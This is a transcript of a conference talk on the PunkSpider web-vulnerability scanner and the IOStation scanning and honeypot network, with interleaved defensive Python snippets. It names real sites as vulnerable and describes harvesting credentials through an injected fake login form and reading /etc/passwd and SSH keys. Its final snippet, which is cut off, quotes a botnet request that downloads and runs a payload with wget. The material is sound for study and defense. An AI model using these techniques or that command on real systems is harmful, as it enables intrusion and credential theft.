Hello, everyone, and welcome to PunkSpider and IO Station: Making a Mess All Over the Internet. I am Jason Hopper, and I'm the Director of Research at QOMPLX, and I'm here with... I'm Alejandro Caceres, I'm the Director of Computer Network Exploitation at QOMPLX. Years ago, Alex developed a system called PunkSpider, and I developed something called IO Station. They're both pretty cool tools, and we've been dusting them off lately and starting to find some really good ways that they can work together, and this talk is just about how they started, how they're going and where they're going to be soon. Yeah. So, we'll start off with a little history lesson on what the fuck is a PunkSpider, right? So, PunkSpider was a distributed mass web application fuzzing project run over a Hadoop cluster and stored in a distributed backend. Don't worry if you didn't fully understand that, we'll be going through what the fuck that means in a few later slides. It was based on some older technology. You might vaguely remember it as that Shodan thing with some SQL injection or some other vulnerabilities about, like, websites or some shit. That's usually how people remember it. So, if you remember something like that, that was PunkSpider. It was presented at ShmooCon 2013 and also had a side guest appearance at DEF CON 2014. So, still a long time ago. During this old release, everything was MapReduce, right? If you remember the time when "big" technology was the big buzzword instead of fucking blockchain or whatever, then you remember the times of big data, right? And the real game changer there was that we could now crunch data in a distributed manner that was not incredibly difficult, right? So, MapReduce was not the most efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well-documented ones. Like, you could follow simple tutorials and get a pretty decent cluster up and running. So, it was actually really cool.
And everything back then was MapReduce. So, now I'm gonna show you my sick UI skills coming up. Nobody get intimidated, you know? This is the old PunkSpider. As you can see, there is a lot of, you know, just text. But the main thing I wanted to show you is you would type in a URL. You could also make that a kind of wildcard URL, right? So like darknet.*, for example. By the way, don't actually go to the site. It used to be a spam site, might have been taken down, whatever, just don't go. And for those of you that already have, you know, sorry. But what do you see, right? So, you see what's returned, which at the bottom bit there is the last date scanned. Of course, we wanna keep our records updated. And a number of web application vulnerabilities that we're fuzzing and scanning for. So, obviously this is blind SQL injection, SQL injection, cross-site scripting, path traversal, blah, blah, blah, other very serious vulnerabilities in websites, right? So, what a lot of people did is, in just an extremely open fashion, we had an open API, open UI, and everything, you could search any websites that you wanted and get either aggregate statistics on the vulnerability state of, for example, if you were to do like *.edu, or just kind of do your own vulnerability research. I believe by the time this project sort of was shelved for a little bit, we had something like 3.4 million vulnerabilities or something like that. So, it was pretty cool. So, now we're out with the old, right? That was old shit. Old technology, great technology, good stuff that inspired a lot of the technology that's around today, but it was still old, right? So, now we're back. We're full-on developing. And the biggest change to the project is that Hyperion Gray was bought by a company called QOMPLX. And QOMPLX has been really amazing about giving us the time, resources, money, backing, legitimacy, everything possible for us to succeed in this project.
Meaning that really, this thing is flying right now. And I'll get into some of the numbers and we'll get into some of the specifics of what we're checking for in PunkSpider right now. But this thing is really flying. It's got dedicated engineering time. It's not going back down. And it's only gonna get better and better. But anyway, that's enough about PunkSpider. Hopper here is gonna give you a bit of backstory about IO Station. Yeah, so, IO Station used to be called AmiSense. I apologize if I accidentally say that in a sentence later. But sysadmins have similarly never liked this program or the system either. It started pretty innocently and, sorry, what it is is just a giant collection of tools that generate and aggregate data and make that available to a user. And it really did start out quite innocently. I was just coming into the cybersecurity space and I started learning about just how crazy the DNS system is, like what you can do with it, the way that it's exploited. And it's such a seemingly simple system, but I couldn't believe the depth. And I was learning about DNS amplification attacks and decided, because the way that I learn things best is by reinventing the wheel, that I would just write a DNS server from scratch, and I turned it into an amplification sinkhole and then started just getting really interested in that. So, I was writing a blog post and I wanted to say, there are this many open recursive DNS servers on the internet. A recursive DNS server, of course, being one that will answer a query for any domain; it'll go out and find the answer up the tree. And so, I couldn't find that answer, how many there were on the internet. So, I started writing a little Python script to do the scan to find them. And then, I realized that although that sounds simple, and conceptually it's simple, there really are a lot of subtleties to actually being able to do even a simple scan at scale.
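As a rough illustration of the open recursive resolver check described above, here is a minimal sketch using only the Python standard library. It is not the speaker's script: the function names, the default query ID, and the choice of an A-record query are all assumptions made for the example. It builds a query with the recursion-desired bit set and treats a server as open and recursive if the reply reports recursion available, no error, and at least one answer.

```python
import socket
import struct

QUERY_ID = 0x1234  # arbitrary transaction ID chosen for this sketch


def build_query(name: str, query_id: int = QUERY_ID) -> bytes:
    """Build a minimal DNS A-record query with the RD (recursion desired) bit set."""
    flags = 0x0100  # RD=1, everything else zero
    header = struct.pack("!HHHHHH", query_id, flags, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def looks_open_recursive(response: bytes, query_id: int = QUERY_ID) -> bool:
    """Inspect only the 12-byte DNS header of a reply."""
    if len(response) < 12:
        return False
    resp_id, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", response[:12])
    is_response = bool(flags & 0x8000)          # QR bit
    recursion_available = bool(flags & 0x0080)  # RA bit
    rcode = flags & 0x000F                      # 0 means no error
    return (resp_id == query_id and is_response
            and recursion_available and rcode == 0 and ancount > 0)


def probe(ip: str, name: str = "example.com", timeout: float = 2.0) -> bool:
    """Send one UDP query to ip:53 and classify the reply; False on timeout or error."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(build_query(name), (ip, 53))
            response, _addr = sock.recvfrom(512)
        except OSError:
            return False
    return looks_open_recursive(response)
```

Calling `probe()` against one address you are authorized to test is the easy part. The subtleties mentioned in the talk (rate limiting, retries, lost packets, abuse complaints) are what a single-host sketch like this leaves out.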
And then it's some giant deep rabbit hole, and before I knew it, I had this big system. It's made up of many different parts, but the primary parts are port scanning. It's scanning over 25 ports. There's a lot of custom extractions that it's doing in addition to the obvious stuff like banner grabbing and service detection and things like that. On the dark web, we're again doing port scanning. We're trying to tease out any information on additional onion sites that might be hosted on the same VM, or definitely any way that we can link it to a surface IP address or domain or something like that, to do attribution for sites that should be taken down by law enforcement. We're also, of course, crawling all these websites as well. So, we're doing dark web mentions for corporate entities and names of other things of interest. And coming from the pure cybersecurity space when we joined QOMPLX, QOMPLX is a cybersecurity company, but they really focus on assessing risk and transferring risk. And so, there's a bit of a mind shift that had to happen on my part, where some things that are really good for pure cybersecurity actually don't inform risk that well. And there are a lot of other tools that you can use in their place. So, I've sort of been working on this system, but with that very much in mind. So, a lot of the new directions, or the new tooling or the new things that I'm interested in, really are kind of going down that same space. And that could be simple things, or seemingly simple things, like even just identifying what a corporation has: what are their assets, where are they? Some corporations honestly can't even answer that question for you. And so, doing this in a kind of broad autonomous fashion is really interesting. How that informs other sorts of risk metrics, and then looking at kind of proxy measures, like what jobs are they hiring for, what technologies do they have in those job ads?
Like, how does that potentially inform, you know, what they're doing in house? We also have some passive sensors, I'll call them. You know, we're monitoring the global certificate transparency log. So, pretty well any SSL certificate that's generated, we record a copy of in near real time. And then we also have another significant component, which is our listening network. So, they're basically these low-interaction honeypots that are distributed globally and all across the IPv4 spectrum. And they're out there sort of just, you know, listening. They can then identify the early onset of any sort of broad malicious activity, or benign activity for that matter. And we can use that as a way to profile the threat in, like, a SOC log, for example. You know, SOCs have a lot to deal with. They don't need to be chasing down leads that end up just being, like, Google crawlers or the university of, you know, whatever doing research. Similarly, we can use this to inform a risk score by looking, for any given corporation, if we know what their assets are: have any of them been involved in, say, being part of a botnet? And if so, for how long? Like, you know, getting popped once last year is one thing; getting popped and then remaining part of a botnet or whatever for six months is kind of something else, which sort of speaks to their detection and remediation policies. Of course, I still have the amplification attack sinkhole. It's not the most particularly valuable sensor, but you know, it's an oldie and a goodie. And then, you know, honestly, I started learning that if you just start registering with places and looking under some rocks, there's some really good data that you can get for free. I mean, ARIN and WHOIS, sorry, ARIN and IANA, can provide lots of data. So I collect WHOIS data on IP addresses, which gives you ASN information, organization details and points of contact. I do get domain WHOIS, but that's such a low-value signal.
It's almost not worth mentioning. One of the ways that Alex and I are collaborating right now, actually, is on doing some analysis of malware that we capture in our network. So that would be just doing fingerprints, looking for what sort of network behavior might be going on, and trying to integrate that with some of the other tools to get a broader picture of what's really going on in the internet. And then I also record all information from the DNS root zone files for like a thousand top-level domains, basically anything that's not a country code. And that can be really interesting just to identify suspicious domains as they pop up. They might be used as, like, a C2 server or phishing or something like that. But then it also can be used in actually identifying assets of a company. The other thing I forgot to mention is, in terms of proxy metrics for the corporations, you can also do things like look at their SEC filings and try to evaluate, for a company of this size in this industry, is their funding in cybersecurity sufficient? And lastly, no cybersecurity tool is complete if you're not pulling in some GeoIP data. So this has been a big undertaking for a lot of years. I started off small, but I needed to rent some servers and things. And I figured I was more interested in spending money on something that I can hold in my hand and have for a long time. So instead of buying a lot of cloud services, I actually convinced my wife to allow me to build a small data center in the basement when we were redoing the basement anyway. And so the middle picture here is sort of the first version of that, where I've got a whole bunch of old desktops, and I bought a few used Dell R710s, which, bang for your buck, are awesome little machines. They're real little workhorses. And I had to become an internet service provider, which meant registering with the government and applying for a license.
I've got a BITS license, which is a basic internet telecom service license, which means I can actually sell internet to my neighbors, which is funny, although there's not really much good reason to do so. It's not exactly cost effective. But I have used some cloud services. So I've done a lot of scanning for years using Linode, and Linode's always been really, really supportive. They have asked me to abide by a number of very reasonable guidelines. And otherwise they provide me a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome. So if by chance anyone from Linode is out there, or the trust and safety team in particular, who I feel like I'm on a first-name basis with, thank you very much. And one thing I'd like to say about this is that I had the lovely opportunity of seeing this project from kind of beginning to end. Not that I was there, I don't live with Jason and his wife, but I got to hear about it from, like, "hey, I'm thinking of building a data center" all the way to that middle picture. By the way, just to point out, Jason is a woodworker, metalworker, astronomer, blah, blah, blah. He does fucking everything and he's good at it too. So he built his own little server rack right there. And you saw that once he surpassed that, he bought a big fucking server rack. So that's just fucking Jason. He's crazy. That's true. I just want to point out how insane it is that he literally built an internet service provider in his basement. And he's like, yeah, no big deal. Just a Saturday. So anyway, that's all. No, it's true. I was quite proud of that little server rack. You know, I used pocket holes and everything, you know? It was fun. But Alex, we've been talking a big game here, man. What do you say we put our websites where our mouth is? I don't know, that's a terrible joke. Sure, no, I like it. Let's put our websites where our mouth is. All right, so a little preface on this one.
So we do have a user interface that has been revamped since the one that Alex has shown. However, it is not released yet. We are releasing a UI in the fall of this year. This is just our sort of internal, alpha-use-only version. Functionally, I'm sure it bears some semblance to what we will end up releasing, but the one in the fall is gonna be much, much nicer than this even. So, you know, this is PunkSpider. No good search engine is complete without a giant search bar. So up at the top here, I'm just gonna pick like a random domain, something that, I don't know, may or may not be a little bit popular, and do a little search. And you can see that this tumblr.com website had no vulnerabilities, but, you know, there actually is this one called kickstarter.com, which just so happens to have, I see here, a cross-site scripting vulnerability. So we display that, we show the parameter that we're using to abuse this, and then we've got these handy-dandy buttons which you can click to test the vulnerability, which will actually open up this webpage with this payload and show you that it actually is working. And then you can also copy a curl command, which is kind of handy if you wanna, you know, change the text or do whatever. We also have this fairly complex way of scoring these websites. So our thinking is that any one of the vulnerabilities that we're testing for is just insane to have on a website in modern times, you know. There's no excuse for it, which means that if you have even one cross-site scripting vulnerability, your security posture basically is a giant dumpster fire. So we, I think very appropriately, rank these websites on a scale of one to five dumpster fires. And that's what this is, you can kind of see it here. So another kind of cool thing, and a way that we've already started to work together between the two projects, is port scan data.
So, you know, this is kind of an easy lift, all things considered, but you can click on ports and see that, you know, this one, for example, is running what looks like a mail server and an OpenSSH server. And so we're starting to bring these data sets together and start answering some communal questions. But at the end of the day, what we want this to be is just a giant database that users can search. You can look at your own domains. You can check the domains that you visit or frequent. We want this to be a really awesome security tool for the masses. And there are a few limits where we've had to walk a fine line. Of course, we don't want people coming here to just, like, rip off the database and go do whatever. But we'll kind of circle back to that. But yeah, did you have anything to add, Alex? No, no, that was an excellent overview of our user interface. You'll see the little country codes, of course, which, as Jason mentioned, are essential to any security tool. Absolutely. So, you know, Alex, it's funny, before this talk, I was actually on this website called archive.org, which I know is really, really popular. And this new browser extension I've got has this, like, this eight on it. And it's trying to tell me something. Do you know anything about that? I don't. You don't? I'm just kidding. I'm sorry. Thanks for the lead-in, bud. Yeah, so PunkSpider has a few goals, and we're going to talk about them a little bit later. But one really big goal that we have is that we want to engage not only with the security community. I know we're speaking at DEF CON and you're probably with the security community. But I think it's really important that we release our stuff out there so that it's digestible by normal humans, right? So if you look at the browser plugin, it's really simple. You may have already guessed this. There are several vulnerabilities on archive.org.
It has a one-dumpster-fire rating, which I believe is appropriate for the number of vulnerabilities found and the types of vulnerabilities found. And probably the most important part of this plugin, frankly, is just that big red spider, right? So that red button just tells you, hey, this website is dangerous. So anybody, whether they know something about web security or don't know anything about web security, whatever, anybody can really use this. One other really cool feature of this plugin is the trip report. So at the very bottom right of the plugin, you can see it says trip report. And if you click on that, well, we've only gone to some sites with cross-site scripting right now, so the results are kind of obvious. But all we're doing is we're taking basic types of extremely serious web application vulnerabilities and giving you a rolled-up kind of view: in my last browsing session, how many websites did I visit that were vulnerable, right? So that's something that you might wanna know. You might wanna say like, oh, shit, okay. I've been browsing for a week and I have like 1% vulnerable. I wanna go back and see who that was and determine if I wanna give them more information, right? Like, extremely important for you to know that. So that's what we wanted to do with this browser extension. It's also got this little reset button that you can press that resets your stats. And one particularly important thing, Jason, if you can just go to like any random website, I know Google is a pretty good one. And open up the extension for me. Yeah. You can see that it's grayed out, right? That means that PunkSpider doesn't currently have any data on it. Or is it, I'm sorry, Jason. Yeah, I went to Google, so it's been scanned. Yeah, I know, it's green, it's been scanned. Oh, fuck me, it's green, okay. So Google has been scanned. So it's gonna tell you if you're clean as well.
Another state of this particular plugin is gray, which means that we haven't scanned it. If it is gray, then you have the option to submit it for a scan. The scan is really, really, really fast. Like, I've never seen it take more than like three or four minutes. So that's currently the plugin. I wanted to show that with a major website like archive.org because most of you have probably heard of it and it's a very awesome website. But we can move on to the next one. Yeah, so just to illustrate the vulnerability here, I'll hit reset and you can see it executing the payload, printing out the message that we've programmed. Yeah, which is totally elite. Yeah, totally elite. All right, cool. Let's move on to the next one. LendingTree, all right, go for it. All right, these fucking LendingTree people. Okay, so LendingTree, right? What can I say about them? Okay, I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in your website. And I did not receive an answer. I can give you a whole rant on my views on fucking responsible disclosure, but I'm gonna save it. And just say that, as you can obviously see from Jason loading the page, this payload is executed seven times. There's absolutely no filtering going on here. And you can also see that it's just in a basic bitch, basic-ass query parameter there, right? And that payload is not very complicated. That's like the basic cross-site scripting payload with like one thing added to it. So there's really no excuse. We contacted LendingTree, let's see, a journalist contacted LendingTree. I contacted, no, I didn't, yeah. So two people contacted LendingTree. This was over a month ago and we still have received absolutely no response. That to me is just egregious. We are not checking for really super complex second-order blind SQL injection to get a fucking out-of-band shell.
We're giving really basic bitch parameter injection here and just getting it right back. So any simple website scanner, whether it be open source, paid, whatever, should really be able to catch this. Hell, you should be able to catch this shit manually if you're building this website. So it's really a kind of inexcusable one. And because it's a popular website, I felt like I'd go ahead and call them out. Also, well, yeah, I won't pick on them anymore. But yeah, that's all I have to say about LendingTree. It is funny too. People complain that you get a pentest team that's not all that good and all they do is run automated tools, but they're cheap or whatever. When we're talking about cross-site scripting and a lot of these vulnerabilities, those would still expose these problems. So these companies are not even doing that. Yeah. Yeah. I mean, even if you include, like, the time of an engineer, that's like 10 minutes. You know, it's not a significant cost either. Anyway, moving on. All right. We've got to move through the next ones, I think, a little bit faster here, but that's okay. This is a good one. All right, not a problem, bud. This is tapas.io. It is a manga website, not about delicious, delicious tapas, but that's okay, right? So as you might have guessed here, if you click on the plugin or were to check PunkSpider or whatever, you can see that it's red. It has a vulnerability in it. It's a cross-site scripting vulnerability. I know that you didn't see an alert box pop up, but let's go through this website real quick and we'll see what it has to say, right? So pretty basic login page: username, password, login, remember me, et cetera. Okay, that's fine, right? So Jason, if you could just scroll all the way down the page for me, please. Oh, holy cow. There's like this whole other login form almost completely covered by the footer. What's that? Yeah. So this is the real login form for the webpage. Thanks for the lead-in, bud.
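To make the "inject a parameter and get it right back" problem concrete, here is a minimal sketch of reflected cross-site scripting and its most basic fix. It is an illustration only, not code from any of the sites discussed; the function names and the page fragment are made up for the example. The only difference between the two functions is whether the query value is HTML-escaped before being placed in the page.

```python
import html


def render_unsafe(query: str) -> str:
    """Echo the query parameter straight into the page (vulnerable to reflected XSS)."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Escape HTML metacharacters so the value is shown as text, not parsed as markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(render_unsafe(payload))  # the script tag survives intact
    print(render_safe(payload))    # the tag is rendered inert as &lt;script&gt;...
```

Escaping on output is only the baseline. The right encoding depends on where the value lands (HTML body, attribute, JavaScript, URL), which is why template engines with contextual auto-escaping are the usual recommendation.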
But this is the real login page for the website, right? So all I've done is, because most cross-site scripting also has an HTML injection vulnerability in it, we just pushed it down with a bunch of BR tags, right? So like line break tags. I pushed the real login all the way down and created a fake login up at the top. So what does that allow me to do? That means that I can grab that link that's in the little bar right there and send it to everybody that I know who uses tapas.io, whether that be from a Twitter search, a LinkedIn search, whatever search, and it's something that they inherently trust, right? So now I can just sit back there and harvest usernames and passwords. I know there are still some cross-origin restrictions that we need to kind of get around. This isn't a web app hacking talk, so I won't go through those, but it is very easy to just start stealing usernames and passwords, is my point. And that sucks. So to anybody who says cross-site scripting is not that serious: you're wrong. This is why you're wrong. Yeah, so our tests aren't looking just for cross-site scripting, although there are many of those. We're also doing SQL injection, as Alex has said before. So this is an example of this. So primeinvestor.in, presumably something to do with finances. They've got a login page. They might have pretty sensitive information behind this. And they're not sanitizing their inputs. So we were able to have the web server execute an SQL query just by putting it into, like, a text form or something like that. It's also kind of interesting that even the error can give you back more information. Like, this is clearly a WordPress site, but this is crazy. I mean, all they're doing is not sanitizing their input. I mean, most frameworks nowadays won't let you avoid it. I mean, you almost have to go out of your way to have this still be a problem.
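The difference between unsanitized input and what most frameworks do by default can be shown in a few lines. This is a minimal sketch against an in-memory SQLite database, not a reconstruction of the site discussed; the table, column names, and sample rows are invented for the example. The unsafe function pastes user input into the SQL text, while the safe one passes it as a bound parameter.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with two hypothetical users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-a')")
    conn.execute("INSERT INTO users VALUES ('bob', 'hash-b')")
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: user input becomes part of the SQL statement itself."""
    query = f"SELECT name FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterized: the driver treats the input purely as a value."""
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "x' OR '1'='1"
    print(find_user_unsafe(conn, payload))  # every row comes back
    print(find_user_safe(conn, payload))    # no rows: nobody has that literal name
```

With the payload `x' OR '1'='1`, the unsafe version's WHERE clause becomes always true and returns every user, which is the kind of behavior a scanner can detect from the outside.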
And it's a huge problem because this is being executed with the same permissions as the web server itself. And so the web server must have read-write permissions on all the tables related to users and things like that. With a website that has this kind of problem, it wouldn't surprise me in the slightest if they had plain text passwords being stored in the database. So potentially they could just dump this whole thing. At the very least, they're probably not salting them or whatever. And you could just, you know, unhash them or something. But this is a massive problem, really. I mean, this is, yeah. Do you have more to say on that, Alex? I do. You know, we think of sites like this, like primeinvestor.in, as not a huge deal, right? I mean, whatever, you found some SQL injection, good job, right? The problem with that is that we can no longer rely on that argument, right? So we are in the age of data breaches. We're at a point where data breaches are so prevalent that, you know, you have tens of trillions of records sometimes in leak aggregators, meaning that every breach, whether it affects you directly or not, whether it's a website that you actually care about or not, whether the username and password that you use on that website was sensitive or not, can still affect you, right? So websites that have nothing to do with you are now seriously affecting the security of corporations and people in general, right? So like I said, we're in the age of the data breach. And stuff like this is really inexcusable. To give you an idea, all of the websites that we're showing are in Alexa's top 5,000. Like, you may not have heard of some of these websites, but they are the top websites on the internet. So to have something like this is really just irresponsible, quite frankly. It's completely irresponsible and it's causing major problems across the internet these days.
Like, even the fucking Colonial Pipeline hack was a credential stuffing attack against their VPN, right? So, I mean, that can be a completely unrelated website that got breached and then a VPN got breached. Like, we can't have websites like this out there that are just giving away usernames and passwords. And we also know now, from all these aggregators that are being built and all the password research that's going on, that, one, people are fucking terrible at passwords. Like, we get secret 5.1 and that's all of a sudden a fucking secure password. But the other thing is that people reuse their passwords everywhere. So even if it's a site that you don't necessarily care about, if you reuse that password in one single place, somebody could easily find it. And that's all I have to say about that. Yeah. I think the next example is actually a pretty cool one. So this is a path traversal attack, which means that we can put in the URL the path to a different file, or something that the web server should definitely not be allowed to access, or certainly shouldn't be showing to a random website viewer. Here we're doing this with the passwd file on Linux, and what that does is it gives us a list of all the different users and groups, including all the system users that this server has. And this is a massive problem because basically this means that we can view files on the server easily. So we could go through this list, find a username that we think is a person, or like an actual user, and then try to, for example, view their private key, their SSH private key. Beyond that, we could also take a few guesses. If it's on a VM, or it's just, you know, hosting this website, maybe it's using some common framework like WordPress or something. So WordPress has some default install folders. So maybe we can then go and try to look at the config file and get the database password.
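For reference, a common application-side guard against this kind of traversal is to resolve the requested path and refuse anything that ends up outside the web root. The following is a minimal sketch under that assumption; the function name and the `/srv/www` root are hypothetical, and it assumes the request path has already been URL-decoded by the framework.

```python
from pathlib import Path
from typing import Optional


def resolve_inside(web_root: Path, requested: str) -> Optional[Path]:
    """Return the resolved file path if it stays under web_root, otherwise None."""
    root = web_root.resolve()
    # Treat the request as relative to the root, then collapse any ".." segments.
    candidate = (root / requested.lstrip("/")).resolve()
    if candidate == root or root in candidate.parents:
        return candidate
    return None


if __name__ == "__main__":
    root = Path("/srv/www")  # hypothetical web root
    print(resolve_inside(root, "css/site.css"))         # stays inside the root
    print(resolve_inside(root, "../../../etc/passwd"))  # None: escapes the root
```

This complements, rather than replaces, file permissions: the web server account should still not be able to read private keys or other users' files even if a check like this is missed.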
So now we could potentially log into the server and access the database freely, or the database of another server being hosted on the same VM. I mean, this server is vulnerable, which means really it's putting all of its neighbors at risk. And it's just, again, it's just so silly. Like, you know, fix the permissions. Yeah. Yeah. Lastly, this one is just sort of a bit of, you know, beating a dead horse here, but Kickstarter has a cross-site scripting vulnerability. So I just hit refresh here, you know, PunkSpider's back. Nothing shows this off better, but Kickstarter is a bigger organization. They can afford, you know, like one intern to just go through and check for obvious scripting vulnerabilities and stuff like that. I mean, there's really no reason for this. You give this company money. You have login credentials. You have user data. I mean, I don't even know what else they probably have on the backend, but you know, you're putting people at risk with this. Yeah. Cool. So all right, let's head back to the slides. All right. So, you know, how is this being used, Alex? Wonderful question, Jason. So I feel like we're news anchors or something, but anyway, so you're probably wondering, of course, so we're releasing a fuck ton of vulnerabilities, right? And we're just giving them out for free. So how do you access them, right? There are a few ways you can use this. One is the browser extension, which we've shown you. Of course, very, very useful. Please download that and use it if you like it. There's a free and open REST API. You can search by vulnerability or domain name, and wildcards are all allowed. You even have character wildcards and things like that. So full wildcard search, there are no limitations there. There's a CLI tool that you can use as well, built by Mr. Hopper over here. So you can get stuff like that as well. Soon to come: a search engine interface, already in alpha. Jason already showed you some of that.
You can search by vulnerability or domain name, wildcards again all in play, we don't limit any of that kind of stuff. A Recon-ng module; Tim Tomes, you know him, wonderful man, wonderful software. Hate mail module, if you use that. A Metasploit module, just because everything needs a Metasploit module. And really anything that you all feel that you would like to see with this data, just shoot us ideas, whether we can build it or you can submit something, it's an open source, you know, thing, whatever. But let us know how we can support you. Yeah. Help us help you. Let us know how to help you, basically, and we will help you out. Moving on from there, how do we do this, right? We get this question a good amount. How do you scan that many websites? Do you have to create your own scanner? Do you have your own fucking internet service provider, et cetera, et cetera. The real answer is it's just a fucking ton of work and a lot of benchmarking, right? The original PunkSpider was built on old technology, so there's a bunch of benchmarking I had to do in terms of what's important. What's important here? Computing power, memory, bandwidth, all kinds of different things. So there were all kinds of tests that we needed to run to make sure that everything was running as smoothly and as quickly as possible. We had some creative engineering in there, right? So we repurposed a lot of technology that's really built for, you know, search engines and data analytics; all of that stuff is being used in the back end of PunkSpider. It's just that we're completely repurposing it for the purposes of offensive security. The last thing that we did is we embraced the cloud, right? Ride the snake, meaning we're addicted. We're all of a sudden addicted to heroin. I mean, AWS. Same thing. What's that? Same thing. Same thing, yeah, very similar things to be addicted to, both in costs of thousands of dollars a month.
AWS is probably more dangerous, but we really embraced it, and we just realized, you know, the world is kind of moving in that direction, so we may as well take advantage of that, right? So next slide, please, sir. All right, all I want to show you is that we do have metrics and monitoring on the back end of the system. Like I said, it is a very well-funded, well-engineered system at this point. Here at the top left, you'll see the word Ferret. Ferret is our custom-built scanner. And all I really wanted to show you here is that there's a bunch of different scan nodes, and each of those scan nodes is handling thousands of different websites. So this will get reshuffled and things like that as more data comes in or as this cluster is scaled more, which to me it looks like it needs to be, a little bit. But it's a good view into the fact that we are doing truly, truly mass distributed scanning. So we could move on to the next slide. Yeah, actually you could skip this slide. Okay. All right, thanks, sir. So how does this work, right? I want to give you a basic architecture of PunkSpider. We have a Kafka queue. Kafka is a simple queuing system: something comes in, and something comes out to a system that's ingesting it, right? The reason we need a queuing system to do this is that we are submitting so many URLs that we need a piece of technology that is distributed and can handle the level of data we're talking about, because we're submitting something like tens of billions of domains, which means hundreds of billions, if not trillions, of actual web pages. So queuing technology is really important here, and it's used very much throughout PunkSpider. Next slide, please, sir. The ferrets. The ferrets, right. So that Kafka queue, again, distributed, just gives you a website. We need something to then scan that website.
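To make the queue-and-scanner split described above a little more concrete, here is a minimal sketch. It assumes Python's standard-library `queue.Queue` as a single-process stand-in for Kafka and a hypothetical `scan` function as a stand-in for a scanner; the names `scan`, `worker`, and `run_pipeline` are illustrative and do not come from PunkSpider itself.

```python
import queue
import threading


def scan(url):
    """Hypothetical stand-in for a real scanner: returns a placeholder record."""
    return {"url": url, "scanned": True}


def worker(url_queue, results, lock):
    """Pull URLs off the shared queue until a None sentinel arrives."""
    while True:
        url = url_queue.get()
        if url is None:  # sentinel: no more work for this worker
            break
        finding = scan(url)
        with lock:  # results is shared between threads
            results.append(finding)


def run_pipeline(urls, num_workers=4):
    """Feed URLs into a queue and let several workers drain it in parallel."""
    url_queue = queue.Queue()
    results = []
    lock = threading.Lock()

    threads = [
        threading.Thread(target=worker, args=(url_queue, results, lock))
        for _ in range(num_workers)
    ]
    for thread in threads:
        thread.start()

    for url in urls:
        url_queue.put(url)
    for _ in threads:  # one sentinel per worker so each one exits
        url_queue.put(None)

    for thread in threads:
        thread.join()
    return results
```

The point of the pattern is that producers and scanners never talk to each other directly, so either side can be scaled on its own. A real deployment would swap the in-memory queue for a distributed one, which is the role Kafka plays in the talk.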
As I mentioned, that application is called Ferret, right? So that's our web app fuzzer. It works really quickly and works in a distributed manner, with that kind of Kubernetes auto scaling. So we need a lot of ferrets to really be able to scan all of these websites and get all of the data that we want and then present that back to you, which is shown in the next slide. And you see that we index these results into two different things. One is RDS, for stats. And the other is CloudSearch, to obviously build the search engine for everybody. So all of this is kind of a simplified view into the entire thing. This feeds back into the queuing system, actually, and can even create more URLs for us to scan and things like that. So that's basically how it works on the backend. What I really wanted to point out is that everything is fucking distributed. Everything is distributed. That's why I have pictures of lots of ferrets, pictures of lots of Kafkas, pictures of lots of results, right? Everything is distributed. So we can scale; sky's the limit. Cool, and you can grab more shit from IOStation, which Jason's gonna tell you about. Yeah, so running a data center has been a lot of work. It's interesting. It's one of those things where you have to decide where you wanna put your time and effort. I've built this system on Postgres, which is awesome. Unless there's a really specific reason to use something else, I use Postgres a lot. RabbitMQ I used for years. However, I had an issue where it would just disconnect consumers all the time. So all the sensors would be passing messages to it, and then the consumers would get disconnected, and then the queues would get so big that they would stop delivering messages, which makes no sense, and then even worse, they'd continue to get big and eventually explode the nodes.
So I eventually replaced it with Kafka, which isn't perfect, but I've definitely had much better results overall. The rest of it is kind of Bash and Python, because I've been developing this myself to this point, and so simplicity is key. Removing as much complexity as you can will, in a lot of ways, make your life a little easier, when it's just a one-person operation, that is. So Alex showed his UI, so I thought I'd toss mine up here too. It's pretty simple. You type in an IP address, search it, and it shows on the map where it's resolving. We've got GeoIP and WHOIS data, and then for the port scan data it shows each port in a different card. I think I mentioned before it's scanning over 25 ports. There's a lot of custom extraction going on in this, and then of course the normal stuff like service identification and banners and stuff like that. It's too much to show in one screenshot, but below is where all the listening service data is, and then there's SSL search and things like that. This website has never been public, nor probably will it ever be, but you know, can't let someone show the world their UI alone. It's so inappropriate. So just a really quick little case study, I guess, of something that has been coming across IOStation. There's this thing called the Mozi botnet. Back in 2019 I started observing it. It's known to other people; it's a really big botnet right now, and basically it's trying command injection on servers. So these are the two URLs that I see most of the time. You can see one of them is next_file=netgear.cfg, and then wget pulls this thing from an IP and port, Mozi.m is the file name, and then it runs it. Similarly, the other one does the same thing but with Mozi.a, and it executes it slightly differently. But basically this looks like it's trying to do this on Netgear equipment at a minimum, and we know from PunkSpider that there are tons of websites that are vulnerable to injection like this.
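As a rough illustration of how a request like the one described above could be picked apart in sensor logs, here is a small sketch. The talk only gives the `next_file=netgear.cfg` parameter, the use of wget, and the `Mozi.m` file name; the rest of `SAMPLE_REQUEST` (the `/setup.cgi` path, the other parameters, and the documentation-range address `192.0.2.10:8080`) is an assumption for illustration, and `extract_payload` is a hypothetical helper, not part of IOStation.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Illustrative request target; only next_file, wget and Mozi.m come from the talk.
SAMPLE_REQUEST = (
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd"
    "&cmd=rm+-rf+/tmp/*;wget+http://192.0.2.10:8080/Mozi.m+-O+/tmp/netgear;sh+netgear"
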